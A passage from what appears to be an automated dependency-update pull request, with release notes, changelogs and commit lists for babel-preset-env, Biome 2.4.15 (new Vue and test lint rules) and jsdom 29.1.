href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.5 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:house:  Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate \u003ccode\u003e@babel/*\u003c/code\u003e dependencies\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.4 (2026-05-05)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-modules-systemjs\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17974\"\u003e#17974\u003c/a\u003e [7.x backport]fix(systemjs): improve module string name support (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 1\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.29.3 (2026-04-30)\u003c/h2\u003e\n\u003ch4\u003e:eyeglasses: Spec Compliance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17923\"\u003e#17923\u003c/a\u003e Support flow extends bound (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-helper-create-class-features-plugin\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17931\"\u003e#17931\u003c/a\u003e fix(decorators): replace super within all removed static elements (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-register\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17915\"\u003e#17915\u003c/a\u003e Fix thread synchronization issues in \u003ccode\u003e@babel/register\u003c/code\u003e (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-compat-data\u003c/code\u003e, \u003ccode\u003ebabel-plugin-bugfix-safari-rest-destructuring-rhs-array\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17788\"\u003e#17788\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/4fba7541180bf5f58256d8e358b544e3831ad090\"\u003e\u003ccode\u003e4fba754\u003c/code\u003e\u003c/a\u003e v7.29.7\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/3cd910d838332b988ed83bdd2ddc22e849e7ea5d\"\u003e\u003ccode\u003e3cd910d\u003c/code\u003e\u003c/a\u003e v7.29.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/3d399f8c8c1e5308bb25e11947d90a111399ac0d\"\u003e\u003ccode\u003e3d399f8\u003c/code\u003e\u003c/a\u003e [7.x backport]docs(preset-env): update CONTRIBUTING.md (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-preset-env/issues/17976\"\u003e#17976\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/183db7bc040a68057489f8981d02962345a322ed\"\u003e\u003ccode\u003e183db7b\u003c/code\u003e\u003c/a\u003e v7.29.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/268f246f21e51b2204ba6dc5349055504cc7420d\"\u003e\u003ccode\u003e268f246\u003c/code\u003e\u003c/a\u003e Add bugfix plugin for Safari array rest destructuring bug (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-preset-env/issues/17788\"\u003e#17788\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/babel/babel/commit/f8524d80799e136313e55da0468777a57d1bf6b6\"\u003e\u003ccode\u003ef8524d8\u003c/code\u003e\u003c/a\u003e Update compat data (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-preset-env/issues/17686\"\u003e#17686\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-preset-env\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@biomejs/biome` from 2.4.9 to 2.4.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/biomejs/biome/releases\"\u003e@​biomejs/biome's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eBiome CLI v2.4.15\u003c/h2\u003e\n\u003ch2\u003e2.4.15\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/9394\"\u003e#9394\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/ba3480e62da6ac7f0f9d99126f1459a72306368b\"\u003e\u003ccode\u003eba3480e\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added the nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/use-test-hooks-in-order\"\u003e\u003ccode\u003euseTestHooksInOrder\u003c/code\u003e\u003c/a\u003e in the \u003ccode\u003etest\u003c/code\u003e domain. The rule enforces that Jest/Vitest lifecycle hooks (\u003ccode\u003ebeforeAll\u003c/code\u003e, \u003ccode\u003ebeforeEach\u003c/code\u003e, \u003ccode\u003eafterEach\u003c/code\u003e, \u003ccode\u003eafterAll\u003c/code\u003e) are declared in the order they execute, making test setup and teardown easier to reason about.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10254\"\u003e#10254\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/e0a54ccc0a0c892fff2270ae772bcecf0d34e79a\"\u003e\u003ccode\u003ee0a54cc\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added a new nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/use-vue-next-tick-promise/\"\u003e\u003ccode\u003euseVueNextTickPromise\u003c/code\u003e\u003c/a\u003e, which enforces Promise syntax when using Vue \u003ccode\u003enextTick\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eFor example, the following snippet triggers the rule:\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eimport { nextTick } from \u0026quot;vue\u0026quot;;\n\u003cp\u003enextTick(() =\u0026gt; {\nupdateDom();\n});\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10219\"\u003e#10219\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/64aee454ac2db2ade31089c1438dd761c94a8d57\"\u003e\u003ccode\u003e64aee45\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added a new nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/no-vue-v-on-number-values/\"\u003e\u003ccode\u003enoVueVOnNumberValues\u003c/code\u003e\u003c/a\u003e, that disallows deprecated number modifiers on Vue \u003ccode\u003ev-on\u003c/code\u003e directives.\u003c/p\u003e\n\u003cp\u003eFor example, the following snippet triggers the rule:\u003c/p\u003e\n\u003cpre lang=\"vue\"\u003e\u003ccode\u003e\u0026lt;input @keyup.13=\u0026quot;submit\u0026quot; /\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10195\"\u003e#10195\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/7b8d4e161a225f14bc9e070e04cc8572ee988bb2\"\u003e\u003ccode\u003e7b8d4e1\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added the new nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/use-vue-valid-v-for/\"\u003e\u003ccode\u003euseVueValidVFor\u003c/code\u003e\u003c/a\u003e, which validates Vue \u003ccode\u003ev-for\u003c/code\u003e directives and reports invalid aliases, missing component keys, and keys that do not use iteration variables.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10238\"\u003e#10238\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/1110256c6d60500ebc05b9d2738fe77345c7ffd6\"\u003e\u003ccode\u003e1110256\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added the recommended nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/no-vue-import-compiler-macros/\"\u003e\u003ccode\u003enoVueImportCompilerMacros\u003c/code\u003e\u003c/a\u003e, which disallows importing Vue compiler macros such as \u003ccode\u003edefineProps\u003c/code\u003e from \u003ccode\u003evue\u003c/code\u003e because they are automatically available.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10201\"\u003e#10201\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/1a08f89df55eafe1d8463696d1be53f8dea90a80\"\u003e\u003ccode\u003e1a08f89\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/realknove\"\u003e\u003ccode\u003e@​realknove\u003c/code\u003e\u003c/a\u003e! - Fixed \u003ca href=\"https://redirect.github.com/biomejs/biome/issues/10193\"\u003e#10193\u003c/a\u003e: \u003ccode\u003estyle/useReadonlyClassProperties\u003c/code\u003e no longer reports class properties as readonly-able when they are assigned inside arrow callbacks nested in class property initializers.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/9574\"\u003e#9574\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/3bd2b6adf0be44eda922ad7610781dd2e387bdb6\"\u003e\u003ccode\u003e3bd2b6a\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/Conaclos\"\u003e\u003ccode\u003e@​Conaclos\u003c/code\u003e\u003c/a\u003e! - Fixed \u003ca href=\"https://redirect.github.com/biomejs/biome/issues/9530\"\u003e#9530\u003c/a\u003e. The diagnostics of \u003ca href=\"https://biomejs.dev/assist/actions/organize-imports/\"\u003e\u003ccode\u003eorganizeImports\u003c/code\u003e\u003c/a\u003e are now more detailed and more precise. They are also better at localizing where the issue is.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10205\"\u003e#10205\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/a704a6c40392e71aad5127ab35c771486116937e\"\u003e\u003ccode\u003ea704a6c\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/Conaclos\"\u003e\u003ccode\u003e@​Conaclos\u003c/code\u003e\u003c/a\u003e! - Fixed \u003ca href=\"https://redirect.github.com/biomejs/biome/issues/10185\"\u003e#10185\u003c/a\u003e. \u003ca href=\"https://biomejs.dev/assist/actions/organize-imports/\"\u003e`organizeImports\u003c/a\u003e now errors when it encounters an unknown predefined group.\u003c/p\u003e\n\u003cp\u003eThe following configuration is now reported as invalid because \u003ccode\u003e:INEXISTENT:\u003c/code\u003e is an unknown predefined group.\u003c/p\u003e\n\u003cpre lang=\"json\"\u003e\u003ccode\u003e{\n  \u0026quot;assist\u0026quot;: {\n    \u0026quot;actions\u0026quot;: {\n      \u0026quot;source\u0026quot;: {\n        \u0026quot;organizeImports\u0026quot;: { \u0026quot;options\u0026quot;: { \u0026quot;groups\u0026quot;: [\u0026quot;:INEXISTENT:\u0026quot;] } }\n      }\n    }\n  }\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/biomejs/biome/blob/main/packages/@biomejs/biome/CHANGELOG.md\"\u003e@​biomejs/biome's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.4.15\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/9394\"\u003e#9394\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/ba3480e62da6ac7f0f9d99126f1459a72306368b\"\u003e\u003ccode\u003eba3480e\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added the nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/use-test-hooks-in-order\"\u003e\u003ccode\u003euseTestHooksInOrder\u003c/code\u003e\u003c/a\u003e in the \u003ccode\u003etest\u003c/code\u003e domain. The rule enforces that Jest/Vitest lifecycle hooks (\u003ccode\u003ebeforeAll\u003c/code\u003e, \u003ccode\u003ebeforeEach\u003c/code\u003e, \u003ccode\u003eafterEach\u003c/code\u003e, \u003ccode\u003eafterAll\u003c/code\u003e) are declared in the order they execute, making test setup and teardown easier to reason about.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10254\"\u003e#10254\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/e0a54ccc0a0c892fff2270ae772bcecf0d34e79a\"\u003e\u003ccode\u003ee0a54cc\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added a new nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/use-vue-next-tick-promise/\"\u003e\u003ccode\u003euseVueNextTickPromise\u003c/code\u003e\u003c/a\u003e, which enforces Promise syntax when using Vue \u003ccode\u003enextTick\u003c/code\u003e.\u003c/p\u003e\n\u003cp\u003eFor example, the following snippet triggers the rule:\u003c/p\u003e\n\u003cpre lang=\"js\"\u003e\u003ccode\u003eimport { nextTick } from \u0026quot;vue\u0026quot;;\n\u003cp\u003enextTick(() =\u0026gt; {\nupdateDom();\n});\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10219\"\u003e#10219\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/64aee454ac2db2ade31089c1438dd761c94a8d57\"\u003e\u003ccode\u003e64aee45\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added a new nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/no-vue-v-on-number-values/\"\u003e\u003ccode\u003enoVueVOnNumberValues\u003c/code\u003e\u003c/a\u003e, that disallows deprecated number modifiers on Vue \u003ccode\u003ev-on\u003c/code\u003e directives.\u003c/p\u003e\n\u003cp\u003eFor example, the following snippet triggers the rule:\u003c/p\u003e\n\u003cpre lang=\"vue\"\u003e\u003ccode\u003e\u0026lt;input @keyup.13=\u0026quot;submit\u0026quot; /\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10195\"\u003e#10195\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/7b8d4e161a225f14bc9e070e04cc8572ee988bb2\"\u003e\u003ccode\u003e7b8d4e1\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added the new nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/use-vue-valid-v-for/\"\u003e\u003ccode\u003euseVueValidVFor\u003c/code\u003e\u003c/a\u003e, which validates Vue \u003ccode\u003ev-for\u003c/code\u003e directives and reports invalid aliases, missing component keys, and keys that do not use iteration variables.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10238\"\u003e#10238\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/1110256c6d60500ebc05b9d2738fe77345c7ffd6\"\u003e\u003ccode\u003e1110256\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/dyc3\"\u003e\u003ccode\u003e@​dyc3\u003c/code\u003e\u003c/a\u003e! - Added the recommended nursery rule \u003ca href=\"https://biomejs.dev/linter/rules/no-vue-import-compiler-macros/\"\u003e\u003ccode\u003enoVueImportCompilerMacros\u003c/code\u003e\u003c/a\u003e, which disallows importing Vue compiler macros such as \u003ccode\u003edefineProps\u003c/code\u003e from \u003ccode\u003evue\u003c/code\u003e because they are automatically available.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10201\"\u003e#10201\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/1a08f89df55eafe1d8463696d1be53f8dea90a80\"\u003e\u003ccode\u003e1a08f89\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/realknove\"\u003e\u003ccode\u003e@​realknove\u003c/code\u003e\u003c/a\u003e! - Fixed \u003ca href=\"https://redirect.github.com/biomejs/biome/issues/10193\"\u003e#10193\u003c/a\u003e: \u003ccode\u003estyle/useReadonlyClassProperties\u003c/code\u003e no longer reports class properties as readonly-able when they are assigned inside arrow callbacks nested in class property initializers.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/9574\"\u003e#9574\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/3bd2b6adf0be44eda922ad7610781dd2e387bdb6\"\u003e\u003ccode\u003e3bd2b6a\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/Conaclos\"\u003e\u003ccode\u003e@​Conaclos\u003c/code\u003e\u003c/a\u003e! - Fixed \u003ca href=\"https://redirect.github.com/biomejs/biome/issues/9530\"\u003e#9530\u003c/a\u003e. The diagnostics of \u003ca href=\"https://biomejs.dev/assist/actions/organize-imports/\"\u003e\u003ccode\u003eorganizeImports\u003c/code\u003e\u003c/a\u003e are now more detailed and more precise. They are also better at localizing where the issue is.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/biomejs/biome/pull/10205\"\u003e#10205\u003c/a\u003e \u003ca href=\"https://github.com/biomejs/biome/commit/a704a6c40392e71aad5127ab35c771486116937e\"\u003e\u003ccode\u003ea704a6c\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/Conaclos\"\u003e\u003ccode\u003e@​Conaclos\u003c/code\u003e\u003c/a\u003e! - Fixed \u003ca href=\"https://redirect.github.com/biomejs/biome/issues/10185\"\u003e#10185\u003c/a\u003e. \u003ca href=\"https://biomejs.dev/assist/actions/organize-imports/\"\u003e`organizeImports\u003c/a\u003e now errors when it encounters an unknown predefined group.\u003c/p\u003e\n\u003cp\u003eThe following configuration is now reported as invalid because \u003ccode\u003e:INEXISTENT:\u003c/code\u003e is an unknown predefined group.\u003c/p\u003e\n\u003cpre lang=\"json\"\u003e\u003ccode\u003e{\n  \u0026quot;assist\u0026quot;: {\n    \u0026quot;actions\u0026quot;: {\n      \u0026quot;source\u0026quot;: {\n        \u0026quot;organizeImports\u0026quot;: { \u0026quot;options\u0026quot;: { \u0026quot;groups\u0026quot;: [\u0026quot;:INEXISTENT:\u0026quot;] } }\n      }\n    }\n  }\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/9dd3271eef16090416b6e77615a01e3bfbcf7993\"\u003e\u003ccode\u003e9dd3271\u003c/code\u003e\u003c/a\u003e ci: release (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/10210\"\u003e#10210\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/7b8d4e161a225f14bc9e070e04cc8572ee988bb2\"\u003e\u003ccode\u003e7b8d4e1\u003c/code\u003e\u003c/a\u003e feat(lint/html/vue): add \u003ccode\u003euseVueValidVFor\u003c/code\u003e (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/10195\"\u003e#10195\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/ba3480e62da6ac7f0f9d99126f1459a72306368b\"\u003e\u003ccode\u003eba3480e\u003c/code\u003e\u003c/a\u003e feat(lint/js): add \u003ccode\u003euseTestHooksInOrder\u003c/code\u003e (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/9394\"\u003e#9394\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/e0a54ccc0a0c892fff2270ae772bcecf0d34e79a\"\u003e\u003ccode\u003ee0a54cc\u003c/code\u003e\u003c/a\u003e feat(lint/js/vue): add \u003ccode\u003euseVueNextTickPromise\u003c/code\u003e (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/10254\"\u003e#10254\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/1110256c6d60500ebc05b9d2738fe77345c7ffd6\"\u003e\u003ccode\u003e1110256\u003c/code\u003e\u003c/a\u003e feat(lint/vue): add \u003ccode\u003enoVueImportCompilerMacros\u003c/code\u003e (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/10238\"\u003e#10238\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/7f7419cc831cc0725c44669964d8ad8f318d4375\"\u003e\u003ccode\u003e7f7419c\u003c/code\u003e\u003c/a\u003e fix: grammar in extends docstring (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/10263\"\u003e#10263\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/0ae58406b4752f296adfccf94b1d2a042c4cddc7\"\u003e\u003ccode\u003e0ae5840\u003c/code\u003e\u003c/a\u003e feat(lint/js): add \u003ccode\u003euseThisForClassMethods\u003c/code\u003e (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/9807\"\u003e#9807\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/83f7385f14d68704510ea4c028cfa20317698fc0\"\u003e\u003ccode\u003e83f7385\u003c/code\u003e\u003c/a\u003e feat(lint/js): add \u003ccode\u003enoBaseToString\u003c/code\u003e (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/9838\"\u003e#9838\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/64aee454ac2db2ade31089c1438dd761c94a8d57\"\u003e\u003ccode\u003e64aee45\u003c/code\u003e\u003c/a\u003e feat(lint/html/vue): add \u003ccode\u003enoVueVOnNumberValues\u003c/code\u003e (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/10219\"\u003e#10219\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/biomejs/biome/commit/46393e0240944064eb2a33c1810fc4204ced0cf7\"\u003e\u003ccode\u003e46393e0\u003c/code\u003e\u003c/a\u003e ci: release (\u003ca href=\"https://github.com/biomejs/biome/tree/HEAD/packages/@biomejs/biome/issues/10100\"\u003e#10100\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/biomejs/biome/commits/@biomejs/biome@2.4.15/packages/@biomejs/biome\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jsdom` from 29.0.1 to 29.1.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jsdom/jsdom/releases\"\u003ejsdom's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev29.1.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003e'border-radius'\u003c/code\u003e computed style serialization. (\u003ca href=\"https://github.com/asamuzaK\"\u003e\u003ccode\u003e@​asamuzaK\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed computed style computation when using \u003ccode\u003e'background-origin'\u003c/code\u003e and \u003ccode\u003e'background-clip'\u003c/code\u003e CSS properties. (\u003ca href=\"https://github.com/asamuzaK\"\u003e\u003ccode\u003e@​asamuzaK\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSignificantly optimized initial calls to \u003ccode\u003egetComputedStyle()\u003c/code\u003e, before the cache warms up. (\u003ca href=\"https://github.com/asamuzaK\"\u003e\u003ccode\u003e@​asamuzaK\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev29.1.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded basic support for the ratio CSS type. (\u003ca href=\"https://github.com/asamuzaK\"\u003e\u003ccode\u003e@​asamuzaK\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed \u003ccode\u003egetComputedStyle()\u003c/code\u003e sometimes returning outdated results after CSS was modified. (\u003ca 